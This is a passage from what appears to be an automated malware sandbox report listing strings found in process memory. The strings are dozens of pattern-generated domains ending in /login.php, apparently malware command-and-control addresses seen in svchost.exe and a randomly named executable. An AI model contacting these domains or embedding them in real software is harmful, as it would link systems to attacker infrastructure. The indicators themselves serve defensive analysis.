00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1632882792.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529751923.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galycuw.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598577017.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549695990.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhib.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2100863069.0000000009D2D000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 
00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.00000000084F0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.0000000009441000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://galykes.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559587168.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynab.com/login.php
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508538530.0000000008A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynuh.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyros.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganycuh.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/http://qebyfup.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539362714.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606846587.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/http://lykyjad.com/http://lykyjad.com/http://pupybul.com/p
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.phpt
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywor.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608386340.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2143261512.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxux.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130977590.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfax.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/http://ganypih.com/http://qebytiq.com/http://qebytiq.com/http://pupybul.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.0000000008723000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 
0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/http://vofyjuk.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/
Source: svchost.exe, 00000002.00000003.2101253018.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617205537.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710580103.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613895496.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088274615.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2101914674.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724217882.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033340194.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598016540.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801191951.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095869599.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.phpr
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725365162.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606550802.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657362701.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657376102.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylyr.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytuj.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/login.php
